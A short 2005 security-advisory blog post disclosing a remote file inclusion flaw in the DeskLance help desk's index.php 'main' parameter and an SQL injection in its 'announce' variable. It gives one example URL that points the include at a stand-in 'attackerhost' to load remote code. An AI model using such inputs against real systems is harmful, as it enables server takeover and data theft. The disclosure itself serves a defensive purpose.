by r0t,der4444,cembo,VietMafia

Thursday, November 24, 2005

DeskLance Vuln.

DeskLance Vuln.
Vuln. dicovered by : r0t
Date: 24 nov. 2005
Vendor:http://www.desklance.com/
affected version: 2.3 and prior

Vuln. description:
Input passed to the "main" parameter in "index.php" isn't properly verified, before it is used to include files. This can be exploited to include arbitrary files from external and local resources.

example:
/support/index.php?main=http://attackerhost/file

aslo "announce" variable isn't properly sanitised before being used in a SQL query.It gives it gives to attacker full path and can be exploited by injecting arbitrary SQL code.


Solution:
Edit the source code to ensure that input is properly sanitised.

0 Comments:

Post a Comment

<< Home

 
Copyright (c) 2006 Pridels Sec Crew